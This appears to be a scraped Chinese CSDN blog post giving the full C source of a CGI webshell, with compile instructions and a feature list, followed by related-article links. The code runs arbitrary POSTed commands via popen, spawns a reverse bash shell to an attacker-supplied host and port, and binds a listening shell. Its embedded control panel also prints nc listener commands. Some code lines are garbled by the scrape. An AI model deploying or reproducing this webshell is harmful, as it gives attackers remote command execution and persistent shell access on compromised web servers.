linux cgi命令,Linux C代码实现cgi shell

最新推荐文章于 2022-10-09 10:17:28 发布
最新推荐文章于 2022-10-09 10:17:28 发布
阅读量340 收藏
点赞数
文章标签: linux cgi命令
本文介绍了一个用C语言编写的CGI Webshell的实现,它支持反弹和监听两种方式获取shell。该Webshell能够接收命令行输入,并通过HTTP POST请求执行命令,同时具备反弹shell和监听shell的功能。当用户通过GET请求指定参数时,程序会根据参数执行相应操作,如建立反向连接或开启监听。此外,代码中还包含了错误处理和一些基本的HTML样式。
摘要由CSDN通过智能技术生成

C语言实现cgi webshell#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

struct get_data {

char key[100];

char value[100];

};

void exec_cmd(void){

printf("Content-type:text/htmlnn");

FILE *command;

int size = atoi(getenv("CONTENT_LENGTH"));

if(size > 1500) {

printf("Error> Post Data is very big");

exit(0);

}

char *buffer = malloc(size+1);

fread(buffer,1,size,stdin);

command = popen(buffer,"r");

char caracter;

while((caracter = fgetc(command))){

if(caracter == EOF) break;

printf("%c",caracter);

}

pclose(command);

free(buffer);

exit(0);

}

int error(char *err){

perror(err);

exit(EXIT_FAILURE);

}

void parser_get(void){

printf("Content-type:text/htmlnn");

struct get_data *s;

char *GET = (char *)getenv("QUERY_STRING");

int i,number_of_get = 0,size_get = strlen(GET);

if(strlen(GET) > 100)

exit(0);

s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));

int element = 0;

int positionA = 0;

int positionB = 0;

int id = 0;

for(i=0;i

if(GET[i] == '='){

id = 1;

s[element].key[positionA] = ' ';

positionB = 0;

continue;

}

if(GET[i] == '&'){

id = 0;

s[element].key[positionA] = ' ';

s[element].value[positionB] = ' ';

positionA = 0;

positionB = 0;

element++;

continue;

}

if(id==0){

s[element].key[positionA] = GET[i];

positionA++;

}

if(id==1){

s[element].value[positionB] = GET[i];

positionB++;

}

if(i == size_get-1 && GET[size_get-1] != '&'){

s[element].key[positionA] = ' ';

s[element].value[positionB] = ' ';

element++;

continue;

}

}

char *host_x = (char *)malloc(100);

host_x = NULL;

char *type_x = (char *)malloc(100);

type_x = NULL;

int port_x = 0;

for(i=0;i

if(strcmp(s[i].key,"type")==0)

type_x = s[i].value;

else if(strcmp(s[i].key,"host")==0)

host_x = s[i].value;

else if(strcmp(s[i].key,"port")==0)

port_x = atoi(s[i].value);

}

free(s);

if(type_x == NULL){

free(type_x);

free(host_x);

exit(0);

}

if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){

printf("Something is wrong ... !!!");

free(type_x);

free(host_x);

exit(0);

}

if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){

printf("You must specify a target host ...");

free(type_x);

free(host_x);

exit(0);

}

if(strcmp(type_x,"reverse") == 0){

struct sockaddr_in addr;

int msocket;

msocket = socket(AF_INET,SOCK_STREAM,0);

if(msocket 

printf("Fail to create socket");

free(host_x);

free(type_x);

exit(0);

}

addr.sin_family = AF_INET;

addr.sin_port = htons(port_x);

addr.sin_addr.s_addr = inet_addr(host_x);

memset(&addr.sin_zero,0,sizeof(addr.sin_zero));

if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){

printf("Fail to connectn");

free(host_x);

free(type_x);

exit(0);

}

printf("Connect with sucess !!!n");

if(fork() == 0){

close(0); close(1); close(2);

dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);

execl("/bin/bash","bash","-i", (char *)0);

close(msocket);

exit(0);

}

free(host_x);

free(type_x);

exit(0);

} else if (strcmp(type_x,"bind")==0) {

int my_socket, cli_socket;

struct sockaddr_in server_addr,cli_addr;

if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){

printf("Fail to create socket");

exit(1);

}

server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(port_x);

server_addr.sin_addr.s_addr = INADDR_ANY;

bzero(&(server_addr.sin_zero), 8);

int optval = 1;

setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);

if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){

printf("Fail to bind");

free(host_x);

free(type_x);

exit(1);

}

if (listen(my_socket, 1) 

printf("Fail to listen");

free(host_x);

free(type_x);

exit(1);

} else {

printf("Listen on port %dn",port_x);

}

if(fork() == 0){

socklen_t tamanho = sizeof(struct sockaddr_in);

if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) 

exit(0);

}

close(0); close(1); close(2);

dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);

execl("/bin/bash","bash","-i",(char *)0);

close(cli_socket);

}

}

free(host_x);

free(type_x);

exit(0);

}

void load_css_js(void){

printf("

#page-wrap {n

margin: 20px auto;n

width: 750px;n

}n

n

h1 {n

font-family: Impact, Charcoal, sans-serif;n

text-shadow: -1px 0 black, 0 1px black,n

1px 0 black, 0 -1px black;n

color: gray;n

border: #00ff00;n

}n

n

body {n

background-color: white;n

}n

n

input[type="text"] {n

margin-bottom: 10px;n

border: 1px solid gray;n

color: black;n

box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);n

}n

n

hr {n

color: gray;n

}n

n

input[type="submit"],input[type="button"] {n

margin-bottom: 10px;n

border: 1px solid gray;n

box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);n

}n

n

#bind_reverse {n

display:none;n

}n

n

label {n

position: relative;n

clear: left;n

float: left;n

width: 15em;n

margin-right: 5px;n

text-align: right;n

margin-top: 5px;n

}n

n

n

div.scroll {n

border: 1px solid gray;n

margin-bottom: 10px;n

color: black;n

font-family: Tahoma, sans-serif;n

padding: 5px;n

width: 745px;n

height: 295px;n

overflow: auto;n

box-shadow: 4px 4px 2px 2px rgba(50, 50, 50, 0.75);n

}n

n

#cmd_rev {n

position: absolute;n

margin-left: 450px;n

top: 150px;n

width: 250px;n

overflow: auto;n

}n

n

#cmd_bin {n

position: absolute;n

margin-left: 450px;n

top: 300px;n

width: 250px;n

overflow: auto;n

}n

n

#rev_s {n

display:inline;n

}n

n

#bind_s {n

display:inline;n

}n

n

n

function exec_cmd(){n

var Rrequest = new XMLHttpRequest();n

var cmd_x = document.getElementById("xxx");n

n

var result = document.getElementById("result");n

n

if(cmd_x.value == '') return;n

if(cmd_x.value == 'clear' || cmd_x.value == 'reset') { result.innerHTML = ''; return; }n

var vv = cmd_x.value;n

n

vv = vv.replace(/,"<");n

vv = vv.replace(/>/g,">");n

n

result.innerHTML += "

\$ "+vv+"
";n

var bodyx = '';n

n

Rrequest.open("POST",window.location.href,true);n

Rrequest.setRequestHeader("Content-type","text/plain");n

Rrequest.send(cmd_x.value);n

n

Rrequest.onreadystatechange = function(){n

if(Rrequest.status == 200){n

if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){n

var complete_cont = Rrequest.responseText;n

complete_cont = complete_cont.replace(/,"<");n

complete_cont = complete_cont.replace(/>/g,">");n

result.innerHTML += '

'+complete_cont+'
';n

result.scrollTop = result.scrollHeight;n

}n

} else {n

if(Rrequest.readyState==4 || Rrequest.readyState=="complete"){n

result.innerHTML += "

error !
";n

return false;n

}n

}n

}n

}n

n

function load_bind(){n

var change_link = document.getElementById("change_link");n

var linkz = change_link.innerHTML;n

n

if(linkz == 'REVERSE/BIND') {n

change_link.innerHTML = "COMMAND LINE";n

document.getElementById("cmd_line").style.display = 'none';n

document.getElementById("bind_reverse").style.display = 'block';n

}n

n

else {n

document.getElementById("bind_reverse").style.display = 'none';n

document.getElementById("cmd_line").style.display = 'block';n

change_link.innerHTML = 'REVERSE/BIND';n

}n

}n

n

function update_div(su,xxxd){n

var status = document.getElementById(xxxd);n

if(su.value == 0 || su.value == ""){n

status.innerHTML = "";n

return false;n

}n

if(xxxd == 'cmd_rev') {n

status.innerHTML = "

nc -v -l "+su.value+"
";n

return true;n

}n");

printf("tvar server_ip = '%s';n",getenv("SERVER_ADDR"));

printf("tstatus.innerHTML = "

nc -v "+server_ip+" "+su.value+"
";n

return true;n

}n

n

function change_div(ev,field){n

if(ev.keyCode == 8 || ev.keyCode == 37 ||n

ev.keyCode == 38 || ev.keyCode == 39 || n

ev.keycode == 40 || ev.keyCode == 46){n

return true;n

}n

n

if(ev.charCode < 48 || ev.charCode > 57){n

return false;n

}n

n

if(field.value > 65535){n

return false;n

}n

return true;n

}n

n

function connect_xxx(div_t){n

n

var get_s = '';n

if(div_t == 'rev_s'){n

var host_rev = document.getElementById("host_rev");n

var port_rev = document.getElementById("port_rev");n

if(host_rev.value == '' || port_rev == '' ) return false;n

get_s = '/?type=reverse&host='+host_rev.value+'&port='+port_rev.value;n

} else if(div_t == 'bind_s'){n

var port_bind = document.getElementById("port_bin");n

if(port_bin.value == '') return false;n

get_s = '/?type=bind&port='+port_bin.value;n

}n

n

var target_div = document.getElementById(div_t);n

target_div.innerHTML = "Wait ...";n

n

var connect_s = new XMLHttpRequest();n

connect_s.open("GET",window.location.href+get_s,true);n

connect_s.timeout = 3000;n

connect_s.ontimeout = function(){n

target_div.innerHTML = "Listen OK !!!"n

}n

n

connect_s.onreadystatechange = function(){n

if(connect_s.status == 200){n

if(connect_s.readyState==4 || connect_s.readyState=="complete"){n

target_div.innerHTML = connect_s.responseText;n

}n

} else {n

if(connect_s.readyState==4 || connect_s.readyState=="complete"){n

result.innerHTML += "error !";n

return false;n

}n

}n

}n

n

n

n

connect_s.send();n

n

n

}n

");

}

int main(void){

if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();

if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();

printf("Content-type:text/htmlnn");

printf("n");

printf("t

ntn");

printf("tt

 C CGI SHELL =D n");

load_css_js();

printf("ntn");

printf("t

n");

printf(" n

n

C - CGI SHELL

C0d3r: webshell | REVERSE/BIND
n
n

n


n

n
n 
Reverse Connection: 
Stop
n 
Host/IP:
n 
Port:
n

n

n 
Bind Connection: 
Stop
n 
Port To Listen:
n

n

n
n

n

n

");

return 0;

}

编译:

gcc shell.c -o shell.cgi

功能:

1.反弹获得shell(target作为客户端)

65766_0.jpg

2.监听获得shell(target作为服务端)

65766_1.jpg

3.命令行执行

65766_2.jpg

uptbio
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式Linux下用C语言写后端接口——CGI实现
yaomianfa的博客
12-17 3377
文章目录简介实验环境下载CGIC库源码配置CGIC编译测试CGI接口编写一个简单的获取表单的CGI接口测试login.cgiCGIC接口API 简介 CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。服务器端与客户端进行交互的常见方式多,CGI 技术就是其中之一。根据CGI标准,编写外部扩展应用程序,可以对客户端浏览器输...
关于linux中的shell的使用技巧
08-20
"Linux Shell 使用技巧大全" 本文总结了 Linuxshell 的使用技巧,涵盖了进程管理、文件管理、网络管理、系统信息等多方面的内容,对于 Linux 开发学习者和系统管理员提供了实用的参考价值。 进程管理 * 使用 ...
C语言编写的CGI开发库(linux)
06-06
前段时间用C开发一个CGI项目,用到其中的一些库,包含大部分API。希望对用C开发的TX有帮助!
Linux C代码实现cgi shell
weixin_34402090的博客
02-05 1117
C语言实现cgi webshell#include &lt;stdio.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/socket.h&
用C语言进行CGI程序设计
JonnyWei的专栏
08-03 1675
一、CGI概述 CGI(公用网关接口)规定了Web服务器调用其他可执行程序(CGI程序)的接口协议标准。Web服务器通过调用CGI程序实现和Web浏览器的交互 , 也就是CGI程序接受Web浏览器发送给Web服务器的信息,进行处理,将响应结果再回送给Web服务器及Web浏览器。CGI程序一般完成Web网页中表单(Form)数据的处理、数据库查询和实现与传统应用系统的集成等工作。CGI程序可以用任何程序设计语言编写,如Shell脚本语言、Perl、 Fortran、Pascal、C语言等。但是用C
Linux CGI编程基础【整理】
dingxiu8587的博客
09-26 359
Linux CGI编程基础 1.为什么使用CGI? 如前面所见,任何的HTML均是静态网页,它无法实现一些复杂的功能,而CGI可以为我们实现。如:a.列出服务器上某个目录中的文件,对目录中的文件进行操作;b.通过CGI实现串口通讯;c.实现数据库接口;d.实现从摄像头读取一张图片显示在网页上… 等等 2. CGI是什么? CGI全称是 Common...
php在linux中可能用到的命令(推荐)
01-11
您可能感兴趣的文章:linux touch,chattr指令详解及用法详解Linux命令修改文件的三个时间Linux C字符串替换函数实例详解linux 详解useradd 命令基本用法Linux shell命令帮助格式详解Linux shell
linux基础与shell编程
02-28
Linux基础与Shell编程是IT领域的核心技能之一,尤其对于系统管理员和开发者来说至关重要。下面将详细阐述这些主题,包括Linux的基础知识、Shell编程的概念、LINUX与UNIX Shell编程指南中的要点,以及通过提供的...
总结了关于linux中的shell的使用技巧
08-18
Linux系统中,Shell是用户与操作系统交互的重要工具,它提供了命令行接口,使得用户能够执行各种系统操作。本文将汇总一些实用的Linux Shell使用技巧,帮助你在Linux开发和学习过程中提升效率。 1. **列出正在...
shellgui-old:使用 Pure Shell CGI 编写的轻量级 Linux 系统 Web 控制面板
06-18
使用Pure Shell CGI编写的轻量级Linux 系统 Web 控制面板。 拥有 Appstore 和完整的防火墙管理策略。 我们将更新任何可以在我们可以做的 linux 上运行的 CLI 程序,成为 Appstore 中的应用程序。 现在它可以在...
Linux下的cgi编写程序
08-22
Linux下的cgi编写,可以帮助你学习web的编程技术,多种语言的结合
linux下最简单的 c 写的cgi源码
02-03
linux下最简单的 c 写的cgi源码 很有参考价值
用C语言制作cgi程序修改linux debian11 ip地址
最新发布
qiuzen的博客
10-09 559
用C语言制作cgi程序修改linux debian11 ip地址
c编译成cgi运行在linux下,Ubuntu + Apache2 环境下用C编写 一个简单的cgi脚本
weixin_34975139的博客
05-04 457
我只学习过c语言,没有学习过prel,网上很多教程都是针对prel的,很少有针对c的。自己在Ubuntu下鼓捣了一下午,也总算是用c成功编写了一个helloworld的cgi,算是cgi入门的第一步。一、安装及配置apache服务器安装apache2服务器#sudo apt-get install apache2配置apache2服务器配置文件位于 /etc/apache2/sites-enabl...
嵌入式Linux之我行——C+CGI+Ajax在S3C2440中的应用
06-11 1025
嵌入式Linux之我行,主要讲述和总结了本人在学习嵌入式linux中的每个步骤。一为总结经验,二希望能给想入门嵌入式Linux的朋友提供方便。如有错误之处,谢请指正。 共享资源,欢迎转载:http://hbhuanggang.cublog.cn 一、开发环境 主  机:Fedora 9 i386 开发板:友善的Mini2440,上面已经移植好了boa web服务器 编译器:a
LINUX CGI
weixin_38293850的博客
06-18 762
为什么要进行CGI编程? 在HTML中,当客户填写了表单,并按下了发送(submit)按钮后,表单的内容被发送到了服务器端,一般的,这时就需要有一个服务器端脚本来对表单的内容进行一些处理,或者是把它们保存起来,或者是按内容进行一些查询,或者是一些别的什么。没有了CGI,WEB的世界就完全失去了它的交互性,所有的信息都变成单向的了,而不能够有任何的反馈。 有的人认为可以用JavaScript来代替CGI程序,这其实是一个概念上的错误。JavaScript只能够在客户浏览器中运行,而CGI却是工作在...
Linux开发——C语言调用外部程序(如lua,python,php,java...)方法(CGI)
qq_25490573的博客
11-09 2739
目录 CGI定义 CGI功能 CGI编程 GET方法: POST方法 实战 get方法服务端代码 get方法外部程序(c语言)例子 post方法服务器端程序 post方法外部程序(c语言)例子 CGI定义 是用于WEB服务器和外部应用之间信息交换的标准接口。物理上是一段程序。 CGI功能 简单功能:计数器、生成包含日期、天气等的页面 中等难度的功能:图象映象、...
linux shellcgi,shellcgi脚本
weixin_32188111的博客
05-13 712
第29章 cgi脚本本章包含内容:基本cgi脚本使用服务器端内嵌(Server Side Includes,SSI)get方法post方法创建交互式脚本能够自动重载web页面得cgi脚本cgi是一种规范,它规定了获取信息得教本如何从服务器中取得信息或向服务器中写入信息.这种脚本或cgi教本可以用任何语言来实现.最流行的是Perl语言,不过你将会发现,也可以用普通的shell脚本来实现.所有得cgi...
Linux操作系统实验报告:熟悉环境与Shell命令
实验内容涵盖了Linux操作系统的基本操作,包括熟悉shell命令、编辑器使用以及C程序的编译和调试。实验者通过实践学习了如何创建目录、切换工作目录、列出目录内容、查看当前工作目录以及使用`gcc`和`gdb`进行C程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值